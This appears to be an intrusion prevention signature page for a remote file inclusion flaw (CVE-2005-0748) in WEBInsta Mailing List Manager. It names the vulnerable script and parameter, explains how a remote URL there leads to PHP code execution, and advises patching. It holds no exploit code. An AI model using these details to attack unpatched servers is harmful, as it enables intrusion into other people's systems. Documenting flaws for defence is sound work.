Intrusion Prevention

WEBInsta.MailListMgr.Remote.File.Inclusion

Description

It indicates a possible exploit of arbitrary file inclusion vulnerability in WEBInsta Mailing list manager application.


WEBInsta Mailing list manager is a PHP based application that provides centralized mailing list and newsletter system for small to medium sized web sites. A remote file include vulnerability is reported in it that may allow an attacker to execute PHP code on the target system with privilege of web server process. The inc/initdb.php script does not properly validate the user-supplied input in the absolute_path parameter. An attacker may include a url link in the absolute_path parameter that may refer to a remote website to download arbitrary PHP code from the remote site and execute it on the target system. The malicious PHP code may contain shellcode or operating system commands to run on the affected system that may allow an attacker to gain access to the system to the extend of the webserver process privilege. It can only be exploited when register_globals and allow_url_fopen directives are enabled in the system.

Affected Products

WEBInsta Mailing Manager 1.3 d and possible earlier versions

Impact

Compromise of the affected system.

Recommended Actions

Apply appropriate patch from the vendor or Upgrade to non-vulnerable version if available.

CVE References

CVE-2005-0748